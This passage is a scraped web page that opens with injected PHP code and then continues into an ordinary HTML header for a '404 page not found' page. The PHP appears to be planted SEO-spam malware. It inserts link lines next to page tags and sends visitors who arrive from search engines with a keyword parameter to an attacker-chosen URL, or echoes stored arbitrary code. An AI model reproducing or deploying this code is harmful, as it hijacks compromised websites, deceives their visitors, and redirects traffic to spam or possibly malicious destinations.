ntent) && !preg_match('#(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<aside(.*)>#', $my_content)) { $my_content = preg_replace('#<aside(.*)>#iUs', "_-aside-_ $ln ", $my_content, 1); } elseif (preg_match('#</header(.*)>#iUs', $my_content)) { $my_content = preg_replace('#</header(.*)>#iUs', "<footer>\n$ln ", $my_content, 1); } elseif (preg_match('#<article(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<article(.*)>#iUs', "<article>\n$ln ", $my_content, 1); } elseif (preg_match('#<footer(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<footer(.*)>#iUs', "<footer>\n$ln ", $my_content, 1); } elseif (preg_match('#<form(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<form(.*)>#iUs', "$ln \n <form>\n ", $my_content, 1); } elseif (preg_match('#<ul(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<ul(.*)>#iUs', "$ln <ul>\n ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); } ob_end_clean(); echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } ?><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="https://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Type" name="Acumbamail-domain-verification" content="a05f2096-3616-11e7-b8de-0050569a455d" /> <meta http-equiv="Expires" content="0"> <meta http-equiv="Last-Modified" content="0"> <meta http-equiv="Cache-Control" content="no-cache, mustrevalidate"> <meta http-equiv="Pragma" content="no-cache"> <script> var userAgentHeader = navigator.userAgent ; var browserIsMobileOrNot = "mobileNOT" ; if( userAgentHeader.includes( "iPad" ) ) { document.querySelector('meta[name="viewport"]').setAttribute( "content", "width=extend-to-zoom" ); } </script> <!-- <script type="text/javascript"> $(window).on("load",function() { $(window).scroll(function() { var windowBottom = $(this).scrollTop() + $(this).innerHeight(); $(".fade").each(function() { /* Check the location of each desired element */ var objectBottom = $(this).offset().top + $(this).outerHeight(); /* If the element is completely within bounds of the window, fade it in */ if (objectBottom < windowBottom) { //object comes into view (scrolling down) if ($(this).css("opacity")==0) {$(this).fadeTo(500,1);} } else { //object goes out of view (scrolling up) if ($(this).css("opacity")==1) {$(this).fadeTo(500,0);} } }); }).scroll(); //invoke scroll-handler on page-load }); </script> --> <title>Error 404 - page not found